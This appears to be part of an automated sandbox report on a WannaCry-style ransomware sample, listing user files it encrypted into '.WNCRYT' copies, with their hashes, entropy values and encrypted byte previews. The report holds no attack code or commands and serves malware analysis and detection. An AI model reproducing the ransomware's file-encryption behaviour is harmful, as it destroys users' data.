                                Preview:WANACRY!......FZ.E4.3.H,..C..$...#.6p.....;..!..=......I.^+.2.AW.FJ.b.. 8.G...+.&...l..:..{.B..U[...t.... v.....J..L@B\$.*D....Ly.p-.(......2...B..n+^Er.@.....y..2.P*r..|..,..KeFuZ.fG-+J.....IA.e..or....f......u.j....o..l.s..|)...eH....0<......9c..5..7.]...................._......P7(..0.../..z...%..gj..b....|.... ....{....-1[...<a...^.sY.....'......p.I.K4..:....v..u^^.N...o.7........X....9.....(.....l<.5.am........+......L.u.[....~:......jf.?.0)/.......^dkp..].`....@Y..N2."N.fL'...J..#..!...b.......m..A.....EM.;Tq.....9.nzsH)p"O.8$..S#...GoI.fi.......7.%.n&:y.N...p...).$.........'..;....P._....".......PRP....:2.nL.......U.g.).WU`zce....8i....gC....w.2.*V...IH....0/U...x]....!b.H..&........\.`..Y.l#./.x..j.6)...^}kM.....gki...._u.c.'.M..i.a.ej....z.B^..uw.).Wo@.cP...@..Tm...BN9.u.."X3].m..[{2...x}..n../......G...J.....+.E.X..86<.a.g.K~"F..c.../.p....>.7.o`.3.E.. .yV.?#....}.....hFst.o...J.....>Jiy].............O..K.(dF.a.R.?.nJY

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.175795857199445
                                Encrypted:false
                                SSDEEP:6:bkEDY6HGO1UysP9XrboNrml4NJPfmWVQE7yTplzIRTnYmFh4SCy6vN1SN:bkEk6HCysVboNrmiNJPfZQE7y7IZnzY4
                                MD5:A2D8F16E79428CA843B0860C1B424995
                                SHA1:31EC46DB47EFD1505163A109CF50B25F03C68C2D
                                SHA-256:49BAF931C4AFF475CAFA05B60E820CE74D9A94C9FDC4E1C2CDDB61BEE248CFD4
                                SHA-512:3C5E4D4A3A24BCA6DFB8BA7E7C7CFFA5CFF0D0517EA584377497D6AD0202BA78CF14CB39FD102922A5D604469071678E8FDEE65C2DF807AC6E8B996622711BF9
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........<._Q..t....T?z~c...{.$B.<.p.X..m..L.E=.%F......y....6..>...V....D.....8.........,+e.{...F.U?v".....N.S......%.....y:7..\/... .~%...ws.K..VR..{..&........qV....y(.Z.*w.....\W#.Fe).........B.b...+.1........V.A.F.J@.....W..N.{.....................5..D.x.5)T.....e.....-.X....

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999836971607662
                                Encrypted:true
                                SSDEEP:24576:aaF+ZRoc0y86PhEX6ea/yS/4bvYVGO9YxvzRNOEmXtRPs/IIvU:aaF+Ac0qm5a/ylbvnO4OJtRhIM
                                MD5:FD3AEF5E0383144701F339C42C9E7ECB
                                SHA1:60E4EF97236AE68CECAAA1DB3EF2DB88665F327C
                                SHA-256:74BBCD55C60728346D2DBF3B39617F7C29843033F91DD6DF48E24F6218DB5D83
                                SHA-512:A36DDC9F98084FD6092034538D11BB3F39A413CC735627BD405965C3C743E25C448475182C3290F5DA29D09832656096F9F003312E166FA16B475440B14CEC4C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....w......|.<..P..t.Zp..jW?O.p..+2..q[.\...#.zB.6_6.x.(2.+|...=@..{...."`..P..3.V.u.T..."I.u{`.}q`.F.(..|t.I.+..P.......IE..`..z..Z...[.'c...\C...b@.Rwk...y..:....}.4=-....x...jFj{.!A..5>!..Y...F.v...w.....9...5"..wy.]...|,(.Ou.`.\<".s#.m..:t.f.7x....................(g...D..da.0.Z.`!Z....=<419xd{{.|.. \..g.....W.y&..`.q.K.s,wY...W..k.-k..Y .@.T..'..O....}\x.......L.@.\....?.........6H..hq....{..qm{.....MT|#.S.*G1n..I8.Wg.....k;L'.l.y>.Y.#Ju...KS.`;...+#....#...7.r...X...g.....K..O..}-.0.)..Tu..w..n.[...Y..^.p...{d....J5/.....H.%./...!.Y.R"G..u.g.I...I....6s.]d..@.ab.{....rO.`. .>...GP].m..O..5.,.*E.q./.q..2...... }m..rc,..6x..............*!HG....1.|.UY.......H...J...,........h.%h....|D0...^.aO.I..........~.|r5w..U~.Z%..$y..n%,.IPfV.g..c......C......d[S[...XD.iKi.)S.A~..#...\.....7Y..(...l.+...I..~..3.sZ.E%lTB..W..*.....u...dF....._.q^.....l..m._.f.j+..I....]`68Wp..<.....A.;.."...R.v.I...+.3..RG9"..Y...pE.,%..`..e@....b.m9*#..a.de..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999815125338464
                                Encrypted:true
                                SSDEEP:24576:jHFzh0FkepI/RbPfjkiHjjIgCb9LTr35GjDC2a4l3uzrb:jHBh0Weppr35mG2akqf
                                MD5:8C67419E9319AEB3388915F2407ECE4F
                                SHA1:18E99AA7E21E78AB9F8CCE005047E9B322FC78CE
                                SHA-256:B526777DD3AFC8A048E63A01BDAB98B1AF0468EC0E62544265C21A722A0DB1C8
                                SHA-512:E403F9C9DE9109F1BC11FBC52F40310296D57DC1FCD8C262761A2613D5A1A3E701FD83320FBC3CD279B53AE2A613EFF2BAB1440081CECEBA6D1C1D242505F9E4
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......t~,KS.Q...g..`K..>..6>.Y../...\..s...7B.i......M.i9......~.."......C..J^..!..Jf.Y.U...<gf.q...t..V.u......KhwSXR.,.....J3. I.a.....r7S....E.<'..{GUo..Zd_...bz[..A.[...[.^....CN%....3.++..zm...p.x..1....G..S.....5..Z.9.G...RQ$0.O~.......j!.T..............IZ.9^..#*.r.C.s...i..f6-..=..-....qh.n.3f...n!y@>Ji...7..K6e._...4..C<hN..i.:.Jf.......,......E............;.`$.....O.Q7.............T..|..W..eZ.o..ou.....).I.9..c'.Rc.S..(a..'M,....).7.-.....r.P."%.....C.Dt.9..?....S..|.gVd....X`>#.K.]...V..|....."...S..2..x.......r...A.,.B.Y?...[.......X...L...@..o..m....Mp.5..ID.;......U.yX..6..?...GM.O...Gl.....&_........H\......E..o.^.......T....A..[rp..h.L.....n:...7...t....Z...U5..q.....3..%F.#.).....T..D.z.xB...G'g{.F1C(..WbS.?Cfz....!...8.O*.v..T/......Bn.M.k4.....At.N\9.G...:.N...R.8..j.2..T..Q.w.......-r.).\...x..7...<9.S.T...".,.5Dh..h.(%.z..u.....(&k..u..w.(?....1a.A..Pr.G/.[ 3.v....VZx.i:.Q`. ..M..+...T'.m2.3.g..o[..e.J.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.2429995253513875
                                Encrypted:false
                                SSDEEP:6:bkEFEzAX8Outo1sF0LNof+nP2O5vDXgtYFT07yfbr4Fhpz0Apx0MjLKSn:bkE4AMOQIsF059T5ktYp0ufP4F7wcjKS
                                MD5:7CFAAA0B03C8B4B91CFD54201835FA9D
                                SHA1:7C128EA4A298669D0E29BD4A4269DABD22F0C327
                                SHA-256:5DCAF98B624B6BD06B9D6476617B58AE8DF408FEEB4D30E01F8B4EE15CC8AB7F
                                SHA-512:D5FA4DF572245BE94E7695923EF78AE96C5631ADB3E348C5785A16777F79A4C89312B7969C0ED5CCEA57A3B847D32E6C9EA893F0AF00850DBADBE6407BE043D4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....t....;U..#B..h.R.[.Ol.g..g..R.V.b.]...;...M..3..vwo.z..Z...F.fUP..<....r..*..".OXm.X..R.kt(.B5......o[.EG.Z.+...A...y.7.8Z^....#.97.........."......6.....p. .e..{L.A...A.54.ZvK..v7F.Td...>.V..Y..6r....<...;K.M.iH.......y...!...r....-QUuD%.~.!...R}.............".7..?...M....h....-V;O,.d..

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4194584
                                Entropy (8bit):7.99995005316091
                                Encrypted:true
                                SSDEEP:98304:8Vu1A5Q7NtMTwkxtsd9mg/EShbVjLMO0g5GvWEw77A:OYMQ8wkxts/9/j11APxWP77A
                                MD5:CB6402DDEBBBE66BC70BCEBDA081C380
                                SHA1:06E7D0BD459411B2EA6B58364AEC2CC94690F291
                                SHA-256:3359E14A20D11683A45E4C0D598719F432661033A0D29DBCD0DEC2C30A7F0D74
                                SHA-512:6B0E986A86CE74A8AFC8B00F71663DF73AE0583ABBEB78D16561D5ADAFCF8701DF35C6ECF1233AC9DA3722886F91D44F62AA5E0FCAF0C025BED6C001E26A43A6
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....5..?T....`.{....1..m.&,.4..K..@.......4..J...].5m.>..."...[^.).b]......&6......v.i.n...).._vPb....7r..og......@O.qB...._.6......9$.......h#.I....Pv.....E..E.7]5..fnf...7....}9.S...M.Q.'i.'.>'...........c..E+~]....e......vj..w..z...Qu...[I....}......@.....q.Q.c....!-O...D.B...ur........+Z.=..O.J...s....T..s`...D.y..8..E!.a1M?L...\hjc..I...%L...\...f...Ef.t.....%...F.'G:.../t.M4.....8.!.......vlT...o^.....;.;7..g..F.I.^..........;....[.............d...s...`.QA&..:U..^9....za....0?f...N...WOf...)0.....#.?..}._...H....K.T....g.|.5.......N.W...i.R..zp........{..1N(..]Zd.O...P..4y.`..)/.@..VfB..... s.b8.u.8.g...R.!H"....ks1.....7,..fz.K1 ...,....tG.qw..0.S..Y..[.z./.t...9.L.=...p...c.?Nz..u*..DSH.].q..nWyk....q.R.6#&.F.h....._......V..6.wb..4o..0..8s.^m.....S..p.{.kv.....e.}.Q.xz;..L.Y|.3.s.AIL...Z.h<x..j..em...4...@E,r....'h\......2x.?.?..c....f...'x...`....F....:......i..1.5.\....@L.3.k..<4.A.Z=Xg...2.>/~e`.(+.,..0g.0.B7=..V.@u+.....l

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_custom_stream.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.218568222481324
                                Encrypted:false
                                SSDEEP:6:bkEsJexLWD6Gg2UuG9/OUhyGi6MaNTh5oC2IXcKk6nSPIuVKLn:bkEIugNsFg6F0Qw6kIuVU
                                MD5:B42A1F3F838E69A4C075D9D966B0D85C
                                SHA1:468106F961607FDDEDBA91BD8F60FBFB2E91D4F7
                                SHA-256:AB293573601111DB3C7EDEFBCA88B4EA8A1C8E9E66BAE692E8052802B47F98A1
                                SHA-512:D88D3E5093CB2FC470A3083C8170FD40BECA6E5D635117F20E376A423DA2A62A53F86DD869108F564FB414E7ABEEC17018C626BD4C36C3B413A54774C040BE0D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........(...24....V.L`.QFO....j@.>...X....d.=....{T0..v.^.'..Y.....}.|m.8l.1...3..)........M.^......O..~5Jl.mT.{.........%N...p..;u..X.....`......=...lpyI>...3....P5*>m.....(lh..?|..3...........)..kY.^..).._...@.v3..j.bcla6+...*...........q..E..!W.............|.;..b?../...\.:.]..e./7./.;p.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_exif.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.1753692077709355
                                Encrypted:false
                                SSDEEP:6:bkEZU9nEzXl4h5NcFlkCB84MKGQxlPkNQ5+3YgT/UdllCJ/iVAc:bkEeqih6QdQrkQ5+36nlsaVn
                                MD5:A8DEF8735C738ECB5C26464BCD9CF762
                                SHA1:0251C37DE6F2FEC832BAFAF3344EAEF9FC01C7A9
                                SHA-256:2A4D51BB76B935139C100B6E6BC7B1F88AD2AEF3A2F1B7125D4F9FE3DFFC7F28
                                SHA-512:B45F1E617B8DE8677E1856B1826E7DC8DC58E31027B06506011E59C70BDED52907E86D1C43136D03C75B8E0F7FFC12B15B24173C4A6D5E1ABBA45C4364524630
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....i....9....z.:,..BLbN.5C.RFhi.l.Q`.....>....n;.2...N...>.4.)..+...>..:...ky^.;oC..+.?.lmp.0..~.Zr...\./R.^......|`m..m 9\P.......'~..w...Gk..'_...;._..K'..&.J...l...nYR%.*A!....r...*..6...|H.............(@.-.7.._o..$.........y.;.&..d../Z.......I.H..J...............PT1....Zo{.?i..lq.....4.......v

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):29512
                                Entropy (8bit):7.993037904662244
                                Encrypted:true
                                SSDEEP:768:yjt6TWelWmrwzpeJ14Ca5isSx9YbmsFkGGPvvcXQ8PMA:yjt458mweJ1zaQ9Vj1vv+T
                                MD5:EA5E6A2C036F2808991E37745F2980F6
                                SHA1:AF7559A6D24B2A66FE77020A275A7864FCE9C316
                                SHA-256:689F032E6090CBE24E6B38549A0B0E1C8DA953F074F43210A13DCDCC255B75EF
                                SHA-512:562330A652C5C4CEEE9935AA5D2AC9F7C7BF29D952719A55DD07C3716F93B17A1A8C5BB175FDF4D72E0CCE560F6C53987F3F9BA4DDAC3A93167B4ECFBBA2452F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.......Sp.......2.F-RC..J9X.J.?...=|.r.i..[.~..x.....b....=ML.,..i...w.e.^..7^...d....b{+...n.N../Ikl.c....8.%....n.w..sc........C.Z..'S.0.c.$;^.7.$_,.?B....o$..q.cp.9D....i].z.!. .<..9....FE.*j\.H#dI.+.F.3..W...`K._...@.8G!.'B}d....u.L.-4..'.J.........0r........ic.'..5..I]...eg...fp.....O/..Y....w....bho..fy..j.t.2.7'..yVE.Q..,(..NZW..U..-%....s..*...%...f..n.V.96).,C.m........>..S1..W..Vf.._B.l.G[.oVv.w...'.S........... ..h..nN...u%....E...D...._..9.........".~....X8.C0.9GT....../a)F0.!P..)A.D....yS...$VP..N...)..FH.......]X..P.?Q6.zV......).?bM1....c.wu.q..%. ..=E.r0.f....$..c..es..~.L.,..W2E,.5-.l-.,IZ...1y.Ff6{..nFhI_.i..=...;...J.N..d..N_...l..p...c..F...K..#..a......".....;.L...%.Tn..x..RN...k5p.N...oS...H`-.|.....F?.K.B ..z..73....4.QC./...J..u...Z....2.C..d.)m&..o.UJ.2.9.gr.V>.....r....qd..xz..R........S...|>...G....P...%(.\+.A]...h...<<$kjWP}...'..V.S..N.3..L.....5.(6.....E..J..U&.T..cz.T5|=e.t.s{..U.oz.3..;%.[..X.tE....$."-.d../

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.147031645512108
                                Encrypted:false
                                SSDEEP:6:bkEneLeoPxFhi+XD5a0AgL45T0o8JxVC1XpaK2T:bkEeRPpD5a5gUpYGXar
                                MD5:73676442458C5C9D001DEBD815764BD6
                                SHA1:41E26E31CED954F19720941D31E6DF152CCE8A1E
                                SHA-256:EBD6964D0D07C80DCEDA84983918ADB59180B08C1D048375A2FEBAEAD4A7ADC0
                                SHA-512:020E149D40977AA282CC05BE274DB150DC7866E248753BA909B8ADB80DF5A3F35F00E76C40EB70FE2EF3FC43FCBE0CFC723E627096F202E691350A5BFDF12842
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........i.3....)..;0....YE..k...j.7..|.mi.g..n.7..[....@..O.8..@...|..\.]u..e..X.f..2|f:.....8.s.Pz.(.G@.........R.qtb/..J~.r..D.y.V..6...@>>1.z..3[.;r......M........`..#QqH`.T.c....DD...O...$.e...Mt........h.*f_...f..Chm~...8....]..3.i..$A5....q@&..............k._.....:.8f..B.U.|a.Y...n..@.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.206804100919654
                                Encrypted:false
                                SSDEEP:6:bkESkLsqcn+zXnZ25VK7Lc/ME7VXgNq7VgKwle73DhylaeGwvha:bkErLsqc+zJ2TgA/hXP7RwlerDUlISa
                                MD5:FDF612F57959D35D8CBAC4D17A3199C5
                                SHA1:F39293708DB1A2F348F8D5EE3E6813601512B5F1
                                SHA-256:AAF739894BE370AC0202C8CED805F6B54640E6ACCCDD9D5B5185704F11870A50
                                SHA-512:0F939694F798CA153D872C595FC5B4BA74A1F837B61E4B60D6693AFDFDFEB948FA6DB96449E353B2C5F82A1D999DEC78C64CFC08FF518DB7A9599260096D6EBA
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....k..12..)RY..$6TaU.).cL.W.x.\..s.[...:.Tym.Ic...j....h....r.GNa..f.p)../.:.YY....o..Y0.8eA..$.<._[...:...8..v.n../.<....(.....7..)`k...['....9..B.|X.6:5X..0v..fjR4\=.}50L.d...V..eb*Ij.e../KI,....}u....*s.n..Z...|+..l\#t.{.I.<...*$G.*....).....RO.rf............t..]?.LU.].".4.....,g6...=.....9

                                C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_wide_alternate.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):312
                                Entropy (8bit):7.205849255861729
                                Encrypted:false
                                SSDEEP:6:bkEq/gSOG+TKsCIHaseBSx07ITpplmgNhUpjipIUV5v/RqBLJif3nUjFXsgn:bkEOj+G66O1jXgpmp9V5sJWU58gn
                                MD5:274E7EA2939887D4DE4C064C002CD9C9
                                SHA1:E0D3156898F7E6266ABCE792F86F87F6214B0DBB
                                SHA-256:F8E4EFC7D090A98385C2C433493A7D736FB5F4B9D5CD229BA0190D8997107E28
                                SHA-512:2C5F33EA897A3B1D857680C5F15828FD0AEC9E17B7A9B54A0546937DF2FD1103B38D3A33DD6761D5BB7A572E0B23FCCEA42224C2EFC3D803C7AE7575738BB49C
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....f..T.=j.....,....Gz..Am.w.[..G..p.g.d.mL].[.I......o..G..ew.o..m...#h~;~...s...&. ^.h......y.l...."}.C..b..W.V.wS5..k..D.%..........e..L.-kK};..=.^......2f;.\q^.....^....*...ai..p8.......Y..Z..&&.X%.B<..;...y....x.....v.%.B..:2).Xc7&z.....'i................D...3.......)..!....ko....s.Z.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1048856
                                Entropy (8bit):7.999809340582305
                                Encrypted:true
                                SSDEEP:24576:zcup/IMPriQJTxk6oYClaz9XKdPIMlGbNLal1Di/O:oupHHfglaz58PIaAWfAO
                                MD5:8F29DEB26F600039472C1B4222D402DF
                                SHA1:EDCB176574DDA2B3636F66AABA15EDAA861744DA
                                SHA-256:3A3620378F032D766B8C675AD6AD5DFB0958284B4631412D0C964FEB45928E49
                                SHA-512:6A17CE97B849CE70A81E62967D2C3F5352BB73902B107DA135E299F555AD62BD62C9AB25D1D7777BE6B83C28F927021EB523CC61E9473079B4938BE62EEFFCB3
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......&.E_L.k...Z.............4.'..Y....|...a......T..m7.s'7E.P.z.X.&N.h.$:..nM..Q..j.I._...a.......yR.z.S...6..=gLs..g0.....aV.v......e..Xz^/k/.?..ci..?..d...oI...y....].G_U....9S.tz.(7{..7.0...i.|..?..3....|;Wj7.....3../.F....._.f&.Kq...Yv..3.............R.Z=P.F.Q.m.4..6._......C.G....}r&M.g..4V.$,h.7P....m.3.<vd.;.....w.]+S:..q..........`.\..%tm....?.jY.......5Ai'.......P..Y.{...........8....c.._..2f..Y...........q.tW]..1...`<.L;.t.]D.S.M....>,~..r...(?...S/...\S>.n.r:P..lz......;A..J..P!..`-...R.E.......}....f....s/........aU.A..C..O.nI.LE.b.~Dt....S90......S..<.C6o...Vb......'."P.{.$..@..=JI...v.m.n)../.M&$...`.R..{.s.W.....!...0.#".:.pI.......(o.....u.f..,.....4.#../.P]...../..0.."Y-.=.Z.....R...@T.N...%6r"7./.h.d.A]U.jy..."r.z..,.L...{.>Wj{..z.^.II..@]...u}..v=0.s...8..k.A9.....c*.q..q.H`".U.l4...cE..5.B........S."`.\...^..........V..uo~..r.N.J..P2k...c-........@..k....n...u..6.8KKpR.J.~....J@...s....J................'=dF...

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\1196d63c.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6360
                                Entropy (8bit):7.968269376079092
                                Encrypted:false
                                SSDEEP:96:oZyW/DVZWXea/zkZWQyoxIsdDGdzcb88z4KxjZG2DMvTvDuOb7Ei/5HCOH7IoUSs:8NUOSkEiIsdDGlr8s+Q2W/Hx1EoUS6F
                                MD5:CD8FED9BA729C7CCFC1D743C315EA366
                                SHA1:AF263276907B15E9745629662863620AD713870B
                                SHA-256:5ECEC5756E8F250AD2152DBA89C767332162BABA7DFB288006B715151432A6FC
                                SHA-512:CB32C31F2E2868F444A94AE8F29C7CC882566EA71B4A54B7B048E754AD9C1A7014092E0681DA6C25B3088D72C3819F346327B66CAC23C345AB2D14748E377CFF
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....d{..........~fT.. ...\..-l....H.....L.[.qGh.X...!0.w.........{....f.A.b...Y^AE.ID...I_..?...7.;.....S...,..m.^..R...."..H...|3...Cb..X...U9...n.M"R.aa..ZW.^......S.....4ytu....8"p..F....uSh.~@.3..|.-C.X.1X.C...Q.s]#i{_.Ll...x9..F..}E8Y..............f#WL..I.....:^m.Q.!N.{..`Q..............?P...[.J...S..9VBn..P..i...9.S..s...>].TKgU'..9NL.".o.>nH.Gp.C....^...U...g.7....i/1.b..J..1.....>..A......Q....TX{.L.%0...@.(..#....`..@.cS.........;..!..dt.".t..X,....{..D..%.|...{A@.........7v...tO.{.....T..(r..c.....a.........@...C9j..DXs<B.J....4Z..$..v..oz.3*N..}.lr. ...Re....|...qi..N.L......"..\VW.tB..(......y......F..&..#.y.).2.U!.Q...o.G.^q.vf.?...Y.q.-.NA.m...R..w.iK.).._o.Z}n..).g.IU.h..q....)zO%Dj....j..N..1p..!&.=...d.p..hk.x.........h......K~^..hT....x>....;...F.X.X..$.b.....J.&z\.Ex$IO84...7hg'...=...ER..5.6....A%..I.-.p.L....9.JB.......]..6N.R..0H.s..jJ..Z.4...$l:.FG.L.....LM;;.N.....\}$..`3........c....m2..l.

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\2b67b297.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6760
                                Entropy (8bit):7.9723794854002925
                                Encrypted:false
                                SSDEEP:96:o5bbu2x780E+CT43jDQtYOE749bNr0P62CrfSlzUlqociJJP6hAOFnRlqdEglVVT:odxCXsMYvMPpbizUlf36hlqKSWMds0x
                                MD5:F3EECA1EE5BA232BABF378A5597FFE9D
                                SHA1:46DCE39A41D5FE252B5988D07DAFB90232FA8197
                                SHA-256:204CA60EEA6AAFC05E3A248BB7DC5DADE8B29E76025C3E22085ED7E346232917
                                SHA-512:02FCF223D52FE7EBF47160CD7E21EC903168F02E2144229F76D77CC8474F9B884D0E34F123B96AFB2343D7BCF31EDB4C01DDDE58A8D8281E8FCB8884AA964500
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!...........#Sc.j....'....B.f.Zz..]h..Y..~...+_.+.8.b.n.|U...........Jl..^...T..I.7.t.=.T..eM.*g#j...}.u."...W...F.....O....c..x.<....T.?..">o{.d...^...)v;).N.h.k..:.N.T.....fw..v7.N....]xQ.6^WL9.JO@../....mi.]....u...x.....V:=G...V..X.w #5o.eh....G.a....K..............3f+qv#TH"].o........5...4....n.....-.p./._S.3..#. .O..$u....d....j.b..."8L_p.D.........d.~..[..v*zq+....fs.].....k.4S.s\.q/#u..d........*..@G..d. ...m5......#N!I.m......OU.k..D..x..Zl.,.....YF,..20........7.]......../.y.>.y...2.,G....W..}..Z..1..B.'..:..y..,h5u.T`..l.. .*...(.}....E.8c...J..u.l...:.f(...cb...\...Q|.@...$......x..k..lN;.UV=.7..6....B....U.h.A...K......Gs.B....I.YT:..+'.O/...o\.......b.]u.......)..&.^p....BO((...........L/&a@..(b.,?./S.....lm._.....G/..K.S.......ot...wF.`&Z^.}M.s.....&..K....$..a...b.6@..q.p.|...j...7@....?.l........W.?.D.8R.(0J#.".A.p.a.+....d<n.......)|....+...0....I.\(.../~.1.>.N.'........."...~,...ZJG..+O...k..yT..D<.uV.w....c.m&EuX.5...4

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\36378e77.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):23448
                                Entropy (8bit):7.992150082275762
                                Encrypted:true
                                SSDEEP:384:idMHwikSun8WPEf4NwdEqSzoQ47VSHG3CBihxvwcslDPWaAU71O3BXD:ieHvB3fDdEnzjQr3CIw9PjAQOhD
                                MD5:72C10AD897E8F0BCDE61B8CDBE7DC822
                                SHA1:72295A31E0FD456680DF2B673A90FBD9FEF802E3
                                SHA-256:F8AAFAF70BBA39780E65C8992DE5D26CE6692E3E78D93921857A95E9B4CFCC07
                                SHA-512:51A6EEABA34203C278072EF15E36C9F87C16675CBD5B42EA0BD8BFECA048D933BCCFDFA8F4DD4D48A16418E3965EB7C67C4EE0F9822EDCBE333DA694303DEF7A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.........l.M:.]..'.rL...V;..!.z...%...I..U......7.1...WUt...v!....5.=z4<.{.\.S..[M7j...E.....O.h..;b..:t..v..7...5...b.=.i9"...b.d......y|.N_.H1......X....ia..8.J..f....KZ'.1.d..X..H%.J)..........6.3..a.....]....d..cx-+..k.I/.....z[.2.)5.I..k.>....uZ......q4.;.S....F)4....<...Mu.'E..{g.4@..2Bf.{.$....e.....;d-.!..........X.k..&..V.....4.x:bu.2r@..6..x...r."aat.4...}.;..n:.u.8jL..8..Pi.p....!.(&=L;..7.(...(.T5..g.EUA..l.....1..1.P-.....^...H.s.V.M..G..k.fw.cJc..(...8.......4 1exCid?#..0:...r...c..#*...w............5........."...|....w.{...j.......=.[}.h,.....R4..z.....8W..LF.d..v..c.Vl.F.......3!Kn...s...2V"......K..v..)<;`........./.5.j.Ko.bM6.....x...j.b|_..o."1...1.....[..E.Py..;.mP..%.<..w(....!.8@eV.T.F-..?.......w$.{..1@...6f.a/...+.h..b..8..ZE;...';.4z@.......d"_>....9:.Q....[Lp...Pt..p............z1xF.MIU.O..>E.z....a..f{.N.Y,s...}...|.+.*N+.r..7.e..........i&....=......C;=.k~rS.+..HG...19..x.7..j...|.i.n..,U..k...8.......

                                C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpnidm\5fc0968a.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5240
                                Entropy (8bit):7.958309648726187
                                Encrypted:false
                                SSDEEP:96:oVP6mIe4uXZTF4WAGG2fA13GXFTNcVlV/hknKh0stt0YudLvNqmkO4/QkrjP:q6mWOZTqWAV2fA1VVHhkKh0UtBudLVqL
                                MD5:57EA8BFA0BC6FEA802FF681FD6AA5E5D
                                SHA1:B86D1D41D2BA4FDB35B2D24473B9A797E3084EF2
                                SHA-256:69D66298AF330BD5E0CD61450E80B1B9642F07635191AB9065A688B1A07B1FBA
                                SHA-512:F69E00725E05490E505114B8F58C3BA8B805F0E62D8F3AC9E369D958FF4B519C851E9F95EA7D619C4DF636547EF89E3B3BC8FDB39444C34E97C5BF6BEF701C00
                                Malicious:false
                                Reputation:unknown
